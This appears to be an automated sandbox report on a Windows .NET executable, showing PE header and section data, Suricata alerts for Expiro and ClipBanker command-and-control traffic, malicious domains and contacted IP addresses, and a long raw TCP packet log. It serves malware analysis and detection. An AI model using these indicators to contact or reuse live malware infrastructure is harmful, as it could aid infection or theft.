                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                        Sections

                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                        .text0x20000x1760400x1762003dfd16e4337b63da37b22da28f0f6e16False0.9308816926996325data7.87067678928939IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .rsrc0x17a0000x126c0x14007c587028606f52cb2f2cc4e8775e05c7False0.708203125data6.39345821116422IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .reloc0x17c0000xc0x2003ccd6629c677ce45428c5fe14c383c1fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                        Resources

                                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                        RT_ICON0x17a1000xbdfPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9348469891411648
                                                                                                                                                                                                                                                                        RT_GROUP_ICON0x17acf00x14data1.05
                                                                                                                                                                                                                                                                        RT_VERSION0x17ad140x358data0.4287383177570093
                                                                                                                                                                                                                                                                        RT_MANIFEST0x17b07c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                                                                                                                                                                        Imports

                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                        mscoree.dll_CorExeMain

                                                                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                                                                        Suricata IDS Alerts

                                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                                        2025-01-15T12:57:11.148650+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249166193.122.130.080TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:57:12.878703+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.22527818.8.8.853UDP
                                                                                                                                                                                                                                                                        2025-01-15T12:57:15.987935+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.22564758.8.8.853UDP
                                                                                                                                                                                                                                                                        2025-01-15T12:57:44.372540+01002034983ET MALWARE Win32/ClipBanker.OC CnC Activity M21192.168.2.224917554.244.188.17780TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:57:47.254510+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.22605078.8.8.853UDP
                                                                                                                                                                                                                                                                        2025-01-15T12:57:50.144218+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.22505688.8.8.853UDP
                                                                                                                                                                                                                                                                        2025-01-15T12:57:51.628338+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.2249182TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:57:51.628338+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.2249182TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:13.044911+01002034983ET MALWARE Win32/ClipBanker.OC CnC Activity M21192.168.2.224918382.112.184.19780TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:20.480766+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.2249188TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:20.480766+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.2249188TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:21.044344+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.22594478.8.8.853UDP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:46.657220+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.2249195TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:46.657220+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.2249195TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:48.207200+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.2249196TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:48.207200+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.2249196TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:53.957588+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.246.200.16080192.168.2.2249204TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:53.957588+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.246.200.16080192.168.2.2249204TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:54.504326+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.227.7.13880192.168.2.2249206TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:54.504326+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.227.7.13880192.168.2.2249206TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:55.969486+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.224919482.112.184.19780TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:57.376908+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.2249211TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:57.376908+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.2249211TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:59.225917+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.2249213TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:59.225917+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.2249213TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:59.720208+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.2249214TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:59.720208+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.2249214TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:59:02.787886+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.2249217TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:59:02.787886+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.2249217TCP

                                                                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.616029978 CET4916380192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.623370886 CET804916354.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.623445034 CET4916380192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.669348955 CET4916380192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.669388056 CET4916380192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.675308943 CET804916354.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.675368071 CET804916354.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.680469036 CET4916480192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.685497046 CET804916454.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.685564041 CET4916480192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.710762978 CET4916480192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.710783958 CET4916480192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.715658903 CET804916454.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:07.715771914 CET804916454.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.335462093 CET804916354.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.335485935 CET804916354.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.335542917 CET4916380192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.390084028 CET804916454.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.391391993 CET804916454.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.391444921 CET4916480192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.780658007 CET4916480192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.785645962 CET804916454.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.817503929 CET4916580192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.822962999 CET804916518.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.823029041 CET4916580192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.827080965 CET4916580192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.827114105 CET4916580192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.832020044 CET804916518.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:08.832048893 CET804916518.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.314410925 CET4916680192.168.2.22193.122.130.0
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.320086956 CET8049166193.122.130.0192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.320152998 CET4916680192.168.2.22193.122.130.0
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.321055889 CET4916680192.168.2.22193.122.130.0
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.326812029 CET8049166193.122.130.0192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:09.794862986 CET8049166193.122.130.0192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.003750086 CET8049166193.122.130.0192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.007431984 CET4916680192.168.2.22193.122.130.0
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.202420950 CET804916518.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.202498913 CET804916518.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.202721119 CET4916580192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.213413954 CET4916580192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.218501091 CET804916518.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.707747936 CET4916780192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.712722063 CET804916754.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.712783098 CET4916780192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.714670897 CET4916780192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.714715004 CET4916780192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.719578028 CET804916754.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.719608068 CET804916754.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.838721037 CET4916680192.168.2.22193.122.130.0
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.843888998 CET8049166193.122.130.0192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:10.938925028 CET8049166193.122.130.0192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.062041044 CET49168443192.168.2.22104.21.80.1
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.062077045 CET44349168104.21.80.1192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.062118053 CET49168443192.168.2.22104.21.80.1
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.091633081 CET49168443192.168.2.22104.21.80.1
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.091648102 CET44349168104.21.80.1192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.148611069 CET8049166193.122.130.0192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.148649931 CET4916680192.168.2.22193.122.130.0
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.427480936 CET804916754.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.427565098 CET804916754.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.427664995 CET4916780192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.439404011 CET4916780192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.444694042 CET804916754.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.580003977 CET44349168104.21.80.1192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.580085039 CET49168443192.168.2.22104.21.80.1
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.628669977 CET49168443192.168.2.22104.21.80.1
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.628699064 CET44349168104.21.80.1192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.629822016 CET44349168104.21.80.1192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.839333057 CET44349168104.21.80.1192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.843379021 CET49168443192.168.2.22104.21.80.1
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.908478022 CET4916980192.168.2.2244.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.913438082 CET804916944.221.84.105192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.915673971 CET4916980192.168.2.2244.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.915673971 CET4916980192.168.2.2244.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.915673971 CET4916980192.168.2.2244.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.921220064 CET804916944.221.84.105192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.921260118 CET804916944.221.84.105192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:11.976378918 CET49168443192.168.2.22104.21.80.1
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.019352913 CET44349168104.21.80.1192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.095705986 CET44349168104.21.80.1192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.095873117 CET44349168104.21.80.1192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.095963955 CET49168443192.168.2.22104.21.80.1
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.225914955 CET49168443192.168.2.22104.21.80.1
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.382141113 CET804916944.221.84.105192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.382229090 CET804916944.221.84.105192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.382294893 CET4916980192.168.2.2244.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.416435003 CET4916980192.168.2.2244.221.84.105
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.421719074 CET804916944.221.84.105192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.924144983 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.929368019 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.929447889 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.929582119 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.929615021 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.934573889 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:12.934608936 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:13.485886097 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:13.686531067 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.155699015 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.160586119 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.160648108 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.160757065 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.165539980 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.636079073 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.636101007 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:14.636142015 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.590998888 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.591046095 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.595895052 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.596276045 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.747982025 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.774323940 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.779257059 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.878885031 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.879007101 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.879069090 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.992872000 CET804917072.52.178.23192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.992933035 CET4917080192.168.2.2272.52.178.23
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:15.996840954 CET4917280192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:16.003274918 CET804917218.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:16.003376007 CET4917280192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:16.003444910 CET4917280192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:16.003459930 CET4917280192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:16.009668112 CET804917218.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:16.009701967 CET804917218.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:17.374181032 CET804917218.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:17.374277115 CET804917218.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:17.374464035 CET4917280192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.201487064 CET4917280192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.206804037 CET804917218.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.895920992 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.900762081 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.900810003 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.900938034 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.900959969 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.905677080 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:18.905689955 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:19.610032082 CET4916380192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:25.879328966 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:25.879473925 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:25.883193970 CET4917180192.168.2.22199.59.243.228
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:25.888808012 CET8049171199.59.243.228192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.297342062 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.297422886 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.297463894 CET4917380192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.303162098 CET804917382.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.310295105 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.316194057 CET804917482.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.316270113 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.316378117 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.316396952 CET4917480192.168.2.2282.112.184.197
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.321971893 CET804917482.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:40.321985960 CET804917482.112.184.197192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.648257017 CET4917580192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.653229952 CET804917554.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.653290987 CET4917580192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.655831099 CET4917580192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.655858994 CET4917580192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.662039042 CET804917554.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:43.662055969 CET804917554.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.372157097 CET804917554.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.372246981 CET804917554.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.372539997 CET4917580192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.410403013 CET4917580192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.415286064 CET804917554.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.419655085 CET4917680192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.424544096 CET804917618.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.424603939 CET4917680192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.424696922 CET4917680192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.424719095 CET4917680192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.430304050 CET804917618.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:44.430351019 CET804917618.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.800672054 CET804917618.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.800838947 CET804917618.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.800892115 CET4917680192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.801518917 CET4917680192.168.2.2218.141.10.107
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.806353092 CET804917618.141.10.107192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.951962948 CET4917780192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.957401037 CET804917754.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.957467079 CET4917780192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.959305048 CET4917780192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.959330082 CET4917780192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.964133978 CET804917754.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:45.964165926 CET804917754.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.694590092 CET804917754.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.694674969 CET804917754.244.188.177192.168.2.22
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.694760084 CET4917780192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.718522072 CET4917780192.168.2.2254.244.188.177
                                                                                                                                                                                                                                                                        Jan 15, 2025 12:57:46.724488020 CET804917754.244.188.177192.168.2.22
